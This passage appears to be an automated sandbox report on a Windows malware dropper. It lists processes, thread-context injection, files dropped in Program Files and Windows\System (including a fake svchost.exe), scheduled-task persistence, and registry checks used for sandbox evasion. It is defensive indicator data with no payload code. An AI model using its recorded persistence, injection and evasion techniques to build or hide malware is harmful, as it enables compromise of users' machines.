1HR1MySDS9W4Xh4BuTVhlZvx.exeXdkhZJCvff8a50yAYGJZolZJ.exe5uUZlD6B0cEHDSZBuDNnYK55.exe5GRfaQA90kKihOxhbAmX5q1H.exe1145901.exe6009642.exemRvJABXCifSAhUTtaxEQl7t8.exei2CgVIrZifSNZnjq75V_2cUY.exeAFad10bImeuPMYb1rnBi1y1t.exe4H4t2AsOcQSAHdHBjitYzETp.exeNkkVSZW229sS2SE1vtc4j53k.exe7294222.exe6654171.exe6090931.exe8320946.exe6262846.exesyotsWcKf5oS_xIcnKpHdZgl.exe3116841.exe8950614.exe1597993.exepid process 4184 1HR1MySDS9W4Xh4BuTVhlZvx.exe 4760 XdkhZJCvff8a50yAYGJZolZJ.exe 4216 5uUZlD6B0cEHDSZBuDNnYK55.exe 3160 5GRfaQA90kKihOxhbAmX5q1H.exe 5316 1145901.exe 6588 6009642.exe 6720 mRvJABXCifSAhUTtaxEQl7t8.exe 6936 i2CgVIrZifSNZnjq75V_2cUY.exe 4804 AFad10bImeuPMYb1rnBi1y1t.exe 7084 4H4t2AsOcQSAHdHBjitYzETp.exe 6032 NkkVSZW229sS2SE1vtc4j53k.exe 8440 7294222.exe 1796 6654171.exe 8336 6090931.exe 7792 8320946.exe 7204 6262846.exe 4824 syotsWcKf5oS_xIcnKpHdZgl.exe 8920 3116841.exe 9484 8950614.exe 9740 1597993.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
svchost.exeAtWo1C_0o4EgMkXZ8i70FmrD.exeTue13a3eaad6ca1da2.exemshta.exeTS8C7UyMm7f4cONqJ7WGeWsJ.exemshta.exed2pWMSMuJC2SPxoArZghL_Tl.exeLzmwAqmV.exeqq0Ug9IY6CQizD6eOGc9J9Xo.exedescription pid process target process PID 3156 set thread context of 2036 3156 svchost.exe svchost.exe PID 2180 set thread context of 5500 2180 AtWo1C_0o4EgMkXZ8i70FmrD.exe setup.exe PID 4104 set thread context of 5524 4104 Tue13a3eaad6ca1da2.exe Tue13a3eaad6ca1da2.exe PID 4708 set thread context of 5532 4708 mshta.exe Tue13530584f2459af.exe PID 4204 set thread context of 2416 4204 TS8C7UyMm7f4cONqJ7WGeWsJ.exe TS8C7UyMm7f4cONqJ7WGeWsJ.exe PID 2252 set thread context of 6528 2252 mshta.exe 7AQ5wKvZuy4mxjyIRh_1ITjV.exe PID 4960 set thread context of 5108 4960 d2pWMSMuJC2SPxoArZghL_Tl.exe d2pWMSMuJC2SPxoArZghL_Tl.exe PID 6500 set thread context of 6448 6500 LzmwAqmV.exe 7xhwbY0KvS7fWRlyf2kBw7nO.exe PID 3492 set thread context of 4852 3492 qq0Ug9IY6CQizD6eOGc9J9Xo.exe qq0Ug9IY6CQizD6eOGc9J9Xo.exe -
Drops file in Program Files directory 21 IoCs
Processes:
c1dNg7rmL7AM4CiqKD1oZyCX.exeShareFolder.exe0bB8aprULCmL4OW0bMY9mihf.exeG9glq53LJPiE8StANY6HSQ0T.exeTue136037e6ffe49ce8.tmpsetup.tmpConhost.exeByaHAL6bgI2pbhcsOF924P3v.exedescription ioc process File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe c1dNg7rmL7AM4CiqKD1oZyCX.exe File created C:\Program Files\Google\HKGZKXCOFY\foldershare.exe.config ShareFolder.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe 0bB8aprULCmL4OW0bMY9mihf.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 0bB8aprULCmL4OW0bMY9mihf.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe G9glq53LJPiE8StANY6HSQ0T.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue136037e6ffe49ce8.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe c1dNg7rmL7AM4CiqKD1oZyCX.exe File created C:\Program Files (x86)\FarLabUninstaller\is-C4BIF.tmp setup.tmp File created C:\Program Files (x86)\Windows Photo Viewer\Lyzhupuvoshu.exe ShareFolder.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe 0bB8aprULCmL4OW0bMY9mihf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 0bB8aprULCmL4OW0bMY9mihf.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue136037e6ffe49ce8.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Conhost.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe 0bB8aprULCmL4OW0bMY9mihf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe ByaHAL6bgI2pbhcsOF924P3v.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\Windows Photo Viewer\Lyzhupuvoshu.exe.config ShareFolder.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe G9glq53LJPiE8StANY6HSQ0T.exe File created C:\Program Files (x86)\FarLabUninstaller\is-824B1.tmp Tue136037e6ffe49ce8.tmp File created C:\Program Files\Google\HKGZKXCOFY\foldershare.exe ShareFolder.exe -
Drops file in Windows directory 23 IoCs
Processes:
MicrosoftEdgeCP.exeVDrYzJIhYBfsOxUVjD6qOlHo.exetaskmgr.exeexplorer.exeMicrosoftEdge.exeMicrosoftEdge.exeWerFault.exeh7pNaKg1Ramme0ohTtFbfQ3J.exeaaaSPc2PtzvTAeDTpwDSd3PG.exesvchost.exeSearchUI.exeShellExperienceHost.exesvchost.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\System\xxx1.bak VDrYzJIhYBfsOxUVjD6qOlHo.exe File created C:\Windows\rescache\_merged\1601268389\3068621934.pri taskmgr.exe File created C:\Windows\rescache\_merged\4032412167\2690874625.pri explorer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\System\xxx1.bak h7pNaKg1Ramme0ohTtFbfQ3J.exe File created C:\Windows\System\xxx1.bak aaaSPc2PtzvTAeDTpwDSd3PG.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\rescache\_merged\1601268389\3068621934.pri SearchUI.exe File created C:\Windows\rescache\_merged\4183903823\1195458082.pri taskmgr.exe File opened for modification C:\Windows\System\svchost.exe h7pNaKg1Ramme0ohTtFbfQ3J.exe File created C:\Windows\rescache\_merged\2717123927\1713683155.pri explorer.exe File created C:\Windows\rescache\_merged\4183903823\1195458082.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\4032412167\2690874625.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri taskmgr.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\System\svchost.exe VDrYzJIhYBfsOxUVjD6qOlHo.exe File opened for modification C:\Windows\System\svchost.exe VDrYzJIhYBfsOxUVjD6qOlHo.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\System\svchost.exe aaaSPc2PtzvTAeDTpwDSd3PG.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6024 5500 WerFault.exe AtWo1C_0o4EgMkXZ8i70FmrD.exe 4676 3976 WerFault.exe Tue130c270d23c79.exe 4396 4304 WerFault.exe gmGBSgUMC9lcooI4mBvCyD9o.exe 5044 4432 WerFault.exe Tue13a47d89c50.exe 3452 4304 WerFault.exe gmGBSgUMC9lcooI4mBvCyD9o.exe 1796 4304 WerFault.exe gmGBSgUMC9lcooI4mBvCyD9o.exe 4504 4304 WerFault.exe gmGBSgUMC9lcooI4mBvCyD9o.exe 7456 4232 WerFault.exe dds4TfzYp9QVoKSZWjdvpOap.exe 5548 4196 WerFault.exe H0CeEMPSUFWGICASTuD05aaY.exe 6812 8012 WerFault.exe W6dQhnol2X1JHQB0qLL6rcXv.exe -
Checks SCSI registry key(s) 3 TTPs 27 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
explorer.exepub1.exed2pWMSMuJC2SPxoArZghL_Tl.exedwy8rW6Lldk0o1PoYRnRbG17.exeTS8C7UyMm7f4cONqJ7WGeWsJ.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2pWMSMuJC2SPxoArZghL_Tl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dwy8rW6Lldk0o1PoYRnRbG17.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TS8C7UyMm7f4cONqJ7WGeWsJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 explorer.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dwy8rW6Lldk0o1PoYRnRbG17.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2pWMSMuJC2SPxoArZghL_Tl.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName taskmgr.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TS8C7UyMm7f4cONqJ7WGeWsJ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d2pWMSMuJC2SPxoArZghL_Tl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dwy8rW6Lldk0o1PoYRnRbG17.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TS8C7UyMm7f4cONqJ7WGeWsJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
CrowdInspect.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CrowdInspect.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier CrowdInspect.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 8700 schtasks.exe 1192 schtasks.exe 7396 schtasks.exe 4716 schtasks.exe 4404 schtasks.exe 6512 schtasks.exe 3564 schtasks.exe 3852 schtasks.exe 5728 schtasks.exe 1400 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe -
Kills process with taskkill 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6696 taskkill.exe 7688 taskkill.exe 3064 taskkill.exe 7336 taskkill.exe 8984 taskkill.exe 3304 taskkill.exe 3352 taskkill.exe 9800 taskkill.exe 6348 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 16 IoCs
Processes:
svchost.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeSearchUI.exeexplorer.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exesvchost.exerundll32.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5f701d2f0cc5d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cbb323300cc5d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{2816B0D5-2C89-48E7-BD94-95E21DE20ED3}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WLD4WMQ3-MJ3I-MV57-663Y-EXT24WLKVJ14} svchost.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "3500" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 